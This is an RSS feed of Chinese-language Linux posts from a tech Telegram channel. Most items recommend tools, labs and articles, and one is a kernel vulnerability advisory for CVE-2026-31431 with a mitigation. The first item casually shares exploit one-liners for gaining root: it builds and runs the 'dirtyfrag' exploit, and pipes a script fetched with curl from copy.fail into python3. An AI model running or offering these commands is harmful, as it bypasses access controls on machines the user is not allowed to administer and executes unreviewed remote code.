<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Linux内核 | OKHK 👀</title><description>个人数字泔水\(⁠◔⁠‿⁠◔⁠)✨ Thinking...</description><link>https://tg.okhk.net</link><item><title>还有之前的 Copy Fail 对应的重置 root 密码curl </title><link>https://tg.okhk.net/posts/9754</link><guid isPermaLink="true">https://tg.okhk.net/posts/9754</guid><pubDate>Fri, 08 May 2026 06:28:57 GMT</pubDate><content:encoded>&lt;a href=&quot;/posts/9753&quot;&gt;&lt;blockquote&gt;&lt;small&gt;
&lt;div&gt;
  &lt;span&gt;OKHK &lt;i&gt;&lt;b&gt;👀&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div&gt;#Linux root 密码重置大法 &lt;i&gt;&lt;b&gt;🤣&lt;/b&gt;&lt;/i&gt;（信创机器不给 root 密码的有救了 git clone https://github.com/V4bel/dirtyfrag.git &amp;amp;&amp;amp; cd dirtyfrag &amp;amp;&amp;amp; gcc -O0 -Wall -o exp exp.c -lutil &amp;amp;&amp;amp; chmod +x ./exp &amp;amp;&amp;amp; ./exp passwd root&lt;/div&gt;
&lt;/small&gt;&lt;/blockquote&gt;&lt;/a&gt;还有之前的 &lt;a href=&quot;https://t.me/iokhk/9639&quot; target=&quot;_blank&quot;&gt;Copy Fail&lt;/a&gt; 对应的重置 root 密码&lt;br /&gt;&lt;pre&gt;&lt;code&gt;curl https&lt;span&gt;:&lt;/span&gt;//copy.fail/exp &lt;span&gt;|&lt;/span&gt; python3 &lt;span&gt;&amp;amp;&amp;amp;&lt;/span&gt; su
passwd root&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt;</content:encoded></item><item><title>🔴 Kernel 漏洞可导致本地提权；请尽快修复或 mitigate</title><link>https://tg.okhk.net/posts/9639</link><guid isPermaLink="true">https://tg.okhk.net/posts/9639</guid><pubDate>Thu, 30 Apr 2026 07:21:23 GMT</pubDate><content:encoded>&lt;i&gt;&lt;b&gt;🔴&lt;/b&gt;&lt;/i&gt; Kernel 漏洞可导致本地提权；请尽快修复或 mitigate。&lt;br /&gt;&lt;br /&gt;- 漏洞与 kernel crypto API 相关。影响 4.14 起的各个版本，也就是目前市面上绝大多数正在运行 Linux 的系统。&lt;br /&gt;- Ubuntu 26.04 (resolute)、Debian 14 (forky) 及 Debian Sid 的最新版本内核已修复此问题。然而，绝大多数发行版/版本尚未有修复。 [2]&lt;br /&gt;- Mitigation 方式是禁用 &lt;code&gt;algif_aead&lt;/code&gt; 模块；预计绝大部分软件不会因此受到干扰。 [1]&lt;br /&gt;&lt;br /&gt;CVE: CVE-2026-31431&lt;br /&gt;CVSS: 7.8 (&lt;a href=&quot;http://kernel.org/&quot; target=&quot;_blank&quot;&gt;kernel.org&lt;/a&gt;)&lt;br /&gt;Introduced-In: 4.14 [3]&lt;br /&gt;Fixed-In: 6.18.22, 6.19.12, 7.0 [3]&lt;br /&gt;&lt;br /&gt;1. &lt;a href=&quot;https://copy.fail/&quot; target=&quot;_blank&quot;&gt;https://copy.fail&lt;/a&gt;&lt;br /&gt;2. &lt;a href=&quot;https://theregister.com/2026/04/30/linux_cryptographic_code_flaw/&quot; target=&quot;_blank&quot;&gt;theregister.com/~&lt;/a&gt;&lt;br /&gt;3. &lt;a href=&quot;https://openwall.com/lists/oss-security/2026/04/29/23&quot; target=&quot;_blank&quot;&gt;openwall.com/~&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt;&lt;a href=&quot;https://copy.fail/&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;Xint&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;Copy Fail — 732 Bytes to Root&quot; src=&quot;/static/https://cdn4.telesco.pe/file/mvhNkkMCnTePiwmsJbFfqM2aAE0l5YuJFq8dznR9E8RrNSQvqjOsYgTo5s_ii5bLuaehraZjCQzv1FbkN4b3eEX7brcL4elDDqwlBz04jIUu3vgsuJydmoCf6jpu79UzHMCCshBMCZDtfrFsQn3Cke3xxx9q5-Fo_CchQw_VlN1oE1w7NQQrc10z2BX_pxrgItMWzUoyFDb5LB1db8a4Oxr7JUv2_YvpRoxHsv4V4oXIohPh4CqjpJq5YoeBpRpuBQKgiIZrAQCLUkawRVdVIja380CPJmYSBt0vyXlTWd3OHNJngn8cLPxrBeFxBxJl6unOi8GQ6lVvLpK8BJ1kVw.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;Copy Fail — 732 Bytes to Root&lt;/div&gt;
  &lt;div&gt;CVE-2026-31431. 100% Reliable Linux LPE — no race, no per-distro offsets, page-cache write that bypasses on-disk file-integrity tools and crosses containers. Found by Xint Code.&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><title>iximiuz Labs - Linux / 容器 / K8s 网络实操题</title><link>https://tg.okhk.net/posts/7787</link><guid isPermaLink="true">https://tg.okhk.net/posts/7787</guid><pubDate>Sat, 22 Nov 2025 06:19:04 GMT</pubDate><content:encoded>&lt;div&gt;
      
        &lt;img src=&quot;/static/https://cdn4.telesco.pe/file/cUU-jeklKbl7nfpBwhm27JEjvo46XnukMfd2T-T5Fa56uiPDLaA8wAKIwlXPjahaAzNfMrzof714vCE8cJIIi6oFrjO2q4lpC4utTZroyv39Ngw8jRbHzw--YdTdSJNKlfIUFhTbj6xlC-IWnOVM8ek09YQaadi1n7wOsh-uAlpBMv3pZmM-xpsMPeajUaLytTPEYOTi83pQcrTZcTLc7fo9rdR02YisVlvheteU49cqNbDdEZoLb7sovLTk5LTzzBy-jII-6g8aYCSq6vYzu95EP0a6_6htz-Mha9g1aCLXxyM42MHmJC0PF57PUr0tAkT_BtgdHziUIPEuXV8psw.jpg&quot; alt=&quot;iximiuz Labs - Linux / 容器 / K8s 网络实操题&quot; width=&quot;800&quot; height=&quot;691&quot; loading=&quot;eager&quot; /&gt;
      
      &lt;div&gt;
        
        ×
        &lt;div&gt;
          
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/div&gt;&lt;b&gt;&lt;u&gt;iximiuz Labs - Linux / 容器 / K8s 网络实操题&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://labs.iximiuz.com/challenges&quot; target=&quot;_blank&quot;&gt;https://labs.iximiuz.com/challenges&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;iximiuz Labs 推出的在线实操题目，每道题都配有互动检测、清晰图解和理论参考，可以看作 DevOps 领域的 LeetCode。&lt;br /&gt;&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;利用 Linux 命名空间，在不改动容器的前提下，访问应用内部调试接口。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;在多个 Docker 容器间共享 PID、IPC 和网络命名空间，掌握 Kubernetes Pod 架构和容器调试的核心技术。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;容器生命周期管理：创建、启动、暂停、恢复、停止及删除，全面理解容器操作流程。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;使用 cgroup freezer 机制暂停与恢复 Linux 进程，实战资源管理。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;通过 UNIX 信号控制容器化应用行为，触发内存使用报告。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;自动重启失败应用，提高容器稳定性。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;清理无用 Docker 卷，释放磁盘空间，优化资源使用。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;理解命名卷与匿名卷的区别，避免数据库容器升级时数据丢失。&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;利用卷实现数据持久化，支持应用容器平滑升级。&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23DevOps&quot;&gt;#DevOps&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23K8s&quot;&gt;#K8s&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Docker&quot;&gt;#Docker&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Network&quot;&gt;#Network&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23GitHub&quot;&gt;#GitHub&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23URL&quot;&gt;#URL&lt;/a&gt;</content:encoded></item><item><title>Linux 启动过程: 从电源按钮到内核 </title><link>https://tg.okhk.net/posts/7570</link><guid isPermaLink="true">https://tg.okhk.net/posts/7570</guid><pubDate>Fri, 31 Oct 2025 11:52:51 GMT</pubDate><content:encoded>&lt;b&gt;Linux 启动过程: 从电源按钮到内核&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://www.0xkato.xyz/linux-boot/&quot; target=&quot;_blank&quot;&gt;https://www.0xkato.xyz/linux-boot/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;文章以各种比喻方式简单清晰地介绍了电脑从按下电源开关后的启动过程，主板是如何找到并运行操作系统的。&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Doc&quot;&gt;#Doc&lt;/a&gt;&lt;a href=&quot;https://www.0xkato.xyz/linux-boot/&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;0xkato&lt;/div&gt;
  
  &lt;div&gt;The Linux Boot Process: From Power Button to Kernel&lt;/div&gt;
  &lt;div&gt;A detailed walkthrough of the Linux boot process from power button to kernel initialization&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><link>https://tg.okhk.net/posts/7295</link><guid isPermaLink="true">https://tg.okhk.net/posts/7295</guid><pubDate>Tue, 14 Oct 2025 07:46:03 GMT</pubDate><content:encoded>&lt;a href=&quot;https://github.com/Mapleawaa/PVE-Tools-9&quot; target=&quot;_blank&quot;&gt;https://github.com/Mapleawaa/PVE-Tools-9&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PVE Tools 9 是专为 Proxmox VE 9.0 设计的一键配置工具，基于 Debian 13 (Trixie) 系统。本工具旨在简化 PVE 的初始配置过程，提供友好的用户界面和安全的操作体验。&lt;br /&gt;&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🚀&lt;/b&gt;&lt;/i&gt; &lt;b&gt;一键换源&lt;/b&gt; - 自动配置清华大学镜像源，大幅提升下载速度&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🚫&lt;/b&gt;&lt;/i&gt; &lt;b&gt;删除订阅弹窗&lt;/b&gt; - 彻底消除烦人的订阅提醒&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;💾&lt;/b&gt;&lt;/i&gt; &lt;b&gt;存储优化&lt;/b&gt; - 智能合并 local 与 local-lvm 存储&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🔄&lt;/b&gt;&lt;/i&gt; &lt;b&gt;Swap 管理&lt;/b&gt; - 可选删除 Swap 分区释放更多空间&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;📦&lt;/b&gt;&lt;/i&gt; &lt;b&gt;系统更新&lt;/b&gt; - 安全的系统升级和清理&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;📊&lt;/b&gt;&lt;/i&gt; &lt;b&gt;系统监控&lt;/b&gt; - 实时显示系统运行状况&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🔧&lt;/b&gt;&lt;/i&gt; &lt;b&gt;硬件直通&lt;/b&gt; - 轻松配置 PCI 设备直通功能&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;⚙️&lt;/b&gt;&lt;/i&gt; &lt;b&gt;CPU 电源管理&lt;/b&gt; - 灵活调整 CPU 性能模式&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🌡️&lt;/b&gt;&lt;/i&gt; &lt;b&gt;温度监控&lt;/b&gt; - 实时显示 CPU 和硬盘温度&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🐙&lt;/b&gt;&lt;/i&gt; &lt;b&gt;Ceph 支持&lt;/b&gt; - 支持 ceph-squid 和 ceph-quincy 源&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🎨&lt;/b&gt;&lt;/i&gt; &lt;b&gt;美观界面&lt;/b&gt; - 彩色输出和友好的用户交互&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;&lt;i&gt;&lt;b&gt;🛡️&lt;/b&gt;&lt;/i&gt; &lt;b&gt;安全备份&lt;/b&gt; - 操作前自动备份重要文件&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23PVE&quot;&gt;#PVE&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23HomeLab&quot;&gt;#HomeLab&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Shell&quot;&gt;#Shell&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Script&quot;&gt;#Script&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Tool&quot;&gt;#Tool&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23GitHub&quot;&gt;#GitHub&lt;/a&gt;&lt;a href=&quot;https://github.com/Mapleawaa/PVE-Tools-9&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;GitHub&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;GitHub - Mapleawaa/PVE-Tools-9: 这里不是主仓库！不要在这里点Stars！主仓库在 https://github.com/PVE-Tools&quot; src=&quot;/static/https://cdn4.telesco.pe/file/YrJoCBz5TSRp_Bl6xBcwTG8b-0TVvJHwNhhJeTG8SOQtNJZBXgdv9nIgJdasxdDWejKjBVLh7b2G2SkE8lwsilZBE4vn-pEay6BCUm3kl541G-nKS6M3b1A8Wxl4SCqIGGymjAiQr_q3_0-TkZxFrLcWXuLRYNdHi3Qt7ruEZp1h9hOUhOAv-azgf9_qIrCL3WNnDcYqCIQtjtvhtj-beguMkAOsScOYt8IH7rDDIU6OK-SW6RWnvLEgj73N413BJ860fbgugROPdWYjEJ8C5nPaMwL4eXeipLNj4yYUlA5IAbLfiSquJdmgDh1FCEjvWugJw6hMIN_HBSdD9GDTOw.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;GitHub - Mapleawaa/PVE-Tools-9: 这里不是主仓库！不要在这里点Stars！主仓库在 https://github.com/PVE-Tools&lt;/div&gt;
  &lt;div&gt;这里不是主仓库！不要在这里点Stars！主仓库在 https://github.com/PVE-Tools - Mapleawaa/PVE-Tools-9&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><title>PacketScope - 内核网络包的函数调用跟踪</title><link>https://tg.okhk.net/posts/6710</link><guid isPermaLink="true">https://tg.okhk.net/posts/6710</guid><pubDate>Fri, 29 Aug 2025 08:00:11 GMT</pubDate><content:encoded>&lt;b&gt;&lt;u&gt;PacketScope - 内核网络包的函数调用跟踪&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://github.com/Internet-Architecture-and-Security/PacketScope&quot; target=&quot;_blank&quot;&gt;https://github.com/Internet-Architecture-and-Security/PacketScope&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PacketScope 是一款基于 eBPF 的协议栈通用分析调试工具，集性能优化、异常诊断与安全防御于一体。它致力于在服务器端实现对网络分组（Packet）在协议栈中的细粒度追踪与智能分析，解决开放服务器面临的性能瓶颈难诊断、传输路径不明晰、底层攻击难防御等三大痛点，提供可视化、智能化的端侧安全分析与防护能力。&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;🧠&lt;/b&gt;&lt;/i&gt; 智能驱动：结合 eBPF 与大语言模型，提供底层网络行为观测与智能化安全防护&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;📊&lt;/b&gt;&lt;/i&gt; 多维度分析：实时追踪网络路径，统计延迟、丢包率、交互频率等指标&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;🌐&lt;/b&gt;&lt;/i&gt; 全球网络可视化：测绘全球路径及延迟，并可视化展示在拓扑图中&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;🔐&lt;/b&gt;&lt;/i&gt; 协议栈级防护：识别并拦截协议栈层的异常流量，弥补传统 WAF/IDS 空白&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;🖥️&lt;/b&gt;&lt;/i&gt; 图形化界面：用户友好的操作界面，便于安全工程师和运维人员快速上手&lt;br /&gt;&lt;br /&gt;----------------------&lt;br /&gt;&lt;br /&gt;以前用 tcpdump 抓一段时间的网络包，再逐个分析找出，定位困难且耗时较久。&lt;br /&gt;&lt;br /&gt;现在可以直接指定网络包（如 RST 包）的相关函数去进行 Hook，精确抓包同时还能得到这个函数的调用堆栈，快速确定业务面临的问题。&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://mp.weixin.qq.com/s/IJFHpbiUhqHiTGYz0AHIXg&quot; target=&quot;_blank&quot;&gt;link&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Network&quot;&gt;#Network&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Tool&quot;&gt;#Tool&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23GitHub&quot;&gt;#GitHub&lt;/a&gt;&lt;a href=&quot;https://github.com/Internet-Architecture-and-Security/PacketScope&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;GitHub&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;GitHub - Internet-Architecture-and-Security/PacketScope: 🎯 A general-purpose protocol stack analysis and debugging tool based on…&quot; src=&quot;/static/https://cdn4.telesco.pe/file/FTsZF8M_X4kVjP_ATrbdgpwKsn4RBoX-W5LG6TTaf7CVRQ9DfCYCl9x2CVvkT2r4Cu2uTfqjRN_nojJTwm4E_oDtt_5EV4ZUhA4bIYmAv-JgYZ4UTz_7U5I3A1NUKoNOpmZuYrgBbTG4QcPm1G85oAv9Lx78_S_03YEVwFY7f1PzbNALqwH4GKnIofqxuMMClbym3BzUQyY1DpnWDSyEQBE26FfS4WujP0YgEAdc5QbKWpfknowWh-57YONzSsniBeUiKJWhKG8TKQZi7JjCXATsilw7-4-fvVSYD0s2c2Tgf0jhbMziUSgPDBbIuLVVC976nSCxvKFE836HPukOxQ.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;GitHub - Internet-Architecture-and-Security/PacketScope: &lt;i&gt;&lt;b&gt;🎯&lt;/b&gt;&lt;/i&gt; A general-purpose protocol stack analysis and debugging tool based on…&lt;/div&gt;
  &lt;div&gt;&lt;i&gt;&lt;b&gt;🎯&lt;/b&gt;&lt;/i&gt; A general-purpose protocol stack analysis and debugging tool based on eBPF &lt;i&gt;&lt;b&gt;🧰&lt;/b&gt;&lt;/i&gt;   - Internet-Architecture-and-Security/PacketScope&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><title>anylinuxfs - macOS 挂载任意 Linux 支持的文件系统</title><link>https://tg.okhk.net/posts/6198</link><guid isPermaLink="true">https://tg.okhk.net/posts/6198</guid><pubDate>Sun, 13 Jul 2025 09:25:14 GMT</pubDate><content:encoded>&lt;b&gt;&lt;u&gt;anylinuxfs - macOS 挂载任意 Linux 支持的文件系统&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://github.com/nohajc/anylinuxfs&quot; target=&quot;_blank&quot;&gt;https://github.com/nohajc/anylinuxfs&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;anylinuxfs 是一个在 macOS 上挂载任意 Linux 支持的文件系统（Filesystem）的工具。基于 libkrun 的 microVM 管理程序和 NFS 协议实现了完全的读写支持，纯用户态实现，无需安装任何内核扩展，不降低系统安全性。&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;a href=&quot;https://t.me/RachelBlahblah/8561&quot; target=&quot;_blank&quot;&gt;实际上是起了一个 Alpine Linux，未曾想象的道路&lt;/a&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持挂载 ext4、btrfs 等任何 Linux 支持的文件系统，包括 NTFS 和 exFAT&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持 LUKS 加密驱动器&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持 LVM（包括跨多个驱动器的卷组）&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持 LVM on LUKS（即加密的 LVM）&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持 Linux RAID&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持内部和外部驱动器&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持 GPT、MBR 或无分区表的磁盘（单个文件系统或 LVM/LUKS 容器）&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;默认通过 NFS 共享到本地主机，也可以跨网络共享&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23macOS&quot;&gt;#macOS&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Tool&quot;&gt;#Tool&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23GitHub&quot;&gt;#GitHub&lt;/a&gt;&lt;a href=&quot;https://github.com/nohajc/anylinuxfs&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;GitHub&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;GitHub - nohajc/anylinuxfs: macOS: mount any linux-supported filesystem read/write using NFS and a microVM&quot; src=&quot;/static/https://cdn4.telesco.pe/file/shM8ySwd5kqIeWT8-YEAW7lAc538HecT7lh06SFeSRd3M20CnXk6-Oa8HkJ599uM9cFShnboninXSLDUX7GzdWOIjyrGDZRiklaHiJ_-Z0m3GmPrYsVBd5OzKyt_qdoBt77vFTy7mTaqvEZ-g9BPPnHshe-ZuuZj05cLt_p0NgJRCz2wXnNo6hBsmXlnKV2JaqV_wmSIWvxHQMXoLi5WUQfkAGQGOGVXeac-Og0Wnh_UIOejMeMjjsdSiWNaQMHz1tuc3X8s6vbENXE7U8FkEQpm51108GNpG0obW90a8bGWWc-UV6d5u-88851W_aetV2pDKpG_e84_QCHL4fA8dA.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;GitHub - nohajc/anylinuxfs: macOS: mount any linux-supported filesystem read/write using NFS and a microVM&lt;/div&gt;
  &lt;div&gt;macOS: mount any linux-supported filesystem read/write using NFS and a microVM - nohajc/anylinuxfs&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><title>#Linux内核《The Kernel in the Mind》，Linux内核开发者写的一系列介绍Linux内核的设计理念、运行机制和核心特性的文章合集</title><link>https://tg.okhk.net/posts/5886</link><guid isPermaLink="true">https://tg.okhk.net/posts/5886</guid><pubDate>Tue, 17 Jun 2025 06:47:03 GMT</pubDate><content:encoded>&lt;a href=&quot;/search/result?q=%23Linux%E5%86%85%E6%A0%B8&quot;&gt;#Linux内核&lt;/a&gt;&lt;br /&gt;《&lt;a href=&quot;https://www.linkedin.com/pulse/kernel-mind-moon-hee-lee-miwze/&quot; target=&quot;_blank&quot;&gt;The Kernel in the Mind&lt;/a&gt;》，Linux内核开发者写的一系列介绍Linux内核的设计理念、运行机制和核心特性的文章合集。&lt;a href=&quot;https://www.linkedin.com/pulse/kernel-mind-moon-hee-lee-miwze/&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;Linkedin&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;The Kernel in the Mind&quot; src=&quot;/static/https://cdn4.telesco.pe/file/nevtj-no-qddUdkrwuhLuTBSTNA0QwTS1u3lf1XX52zWT3_k808J2jnmUCg1XnDjnExKVEyj9jJtPZVyN70IA4g9WSc2VdKCzICSPaQ9B6CkRn-Zb7Y6XDkp1CYpc_T54Sbb10-7g6M983DBiAywFfH8mqAs8Y7mpW-6CYuGeWhoalh8geVc_3LROXIh6z4eG2FQ57C5NV08DXpD4IcK3HwKc7Ihs_-mnUPL1PFxull9EKKsnozlOGVYDLL-y30bXHv3tOvFfl7EmesBHPfdHgUh_FtVw0grimpE-7IEex6L7MEREI5Li1uFjI2R8B5fIds-qldz-p-v32ZSUJWj2A.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;The Kernel in the Mind&lt;/div&gt;
  &lt;div&gt;Understanding Linux Kernel Before Code This isn’t a guide to writing kernel code. It’s an effort to understand how the Linux kernel thinks.&lt;/div&gt;
&lt;/a&gt;</content:encoded></item><item><title>eCapture - 免证书网络抓包工具</title><link>https://tg.okhk.net/posts/5482</link><guid isPermaLink="true">https://tg.okhk.net/posts/5482</guid><pubDate>Sat, 17 May 2025 09:30:09 GMT</pubDate><content:encoded>&lt;b&gt;&lt;u&gt;eCapture - 免证书网络抓包工具&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;https://github.com/gojue/ecapture&quot; target=&quot;_blank&quot;&gt;https://github.com/gojue/ecapture&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;eCapture (旁观者) 是一个使用 eBPF (Extended Berkeley Packet Filter) 技术在 Linux 和 Android 内核上捕获 SSL/TLS 明文的工具，无需 CA (Certificate Authority) 证书。&lt;br /&gt;&lt;br /&gt;它支持 Linux/Android 内核版本 x86_64 4.18 及以上、aarch64 5.5 及以上,需要 ROOT 权限,不支持 Windows 和 macOS 系统。&lt;br /&gt;&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持抓包 OpenSSL、GnuTLS、NSPR(NSS)、BoringSSL 等库的 SSL/TLS 明文数据&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持抓包 Golang 程序使用 TLS/HTTPS 加密的明文通信&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持审计 Bash、Zsh 命令&lt;br /&gt;&lt;b&gt;● &lt;/b&gt;支持审计 MySQL 和 PostgreSQL 的 SQL 查询&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;/search/result?q=%23GitHub&quot;&gt;#GitHub&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Network&quot;&gt;#Network&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Tool&quot;&gt;#Tool&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Linux&quot;&gt;#Linux&lt;/a&gt; &lt;a href=&quot;/search/result?q=%23Android&quot;&gt;#Android&lt;/a&gt;&lt;a href=&quot;https://github.com/gojue/ecapture&quot; target=&quot;_blank&quot;&gt;
  
  &lt;div&gt;GitHub&lt;/div&gt;
  &lt;img class=&quot;link_preview_image&quot; alt=&quot;GitHub - gojue/ecapture: Capturing SSL/TLS plaintext without a CA certificate using eBPF. Supported on Linux/Android kernels for…&quot; src=&quot;/static/https://cdn4.telesco.pe/file/l54NflCRKAl5iXebZr_QfYoI2_BHGAKQflnOhqbmgHzl3yxh5qsvlE9yfKWmCnfmQsUpmmcg8M90JMEy2_u7dNMOiS89xjjIOcWQh0EhPDn_sOQwcJaHqAO_eja4rprxUoI2XME5QJiCavuAGe2bbFZVBfi0BKUxabSmNHSKXuudCgYoVSDuWsGzFysGhtwObjLPne8Y0rkEeznSlIZ5tmsHoW7g0fFJOgX5FeSajWjuybYotsVUxRqFBD_2n-XtUyDTWlAk4E-MM3BUNUJW-Y8ctPlXbE15LniPBumVaRnf44iZEZhztifceNABKQNhWcp1GNJkfK3dCwcA5GKXxA.jpg&quot; width=&quot;1200&quot; height=&quot;630&quot; loading=&quot;eager&quot; /&gt;
  &lt;div&gt;GitHub - gojue/ecapture: Capturing SSL/TLS plaintext without a CA certificate using eBPF. Supported on Linux/Android kernels for…&lt;/div&gt;
  &lt;div&gt;Capturing SSL/TLS plaintext without a CA certificate using eBPF. Supported on Linux/Android kernels for amd64/arm64. - gojue/ecapture&lt;/div&gt;
&lt;/a&gt;</content:encoded></item></channel></rss>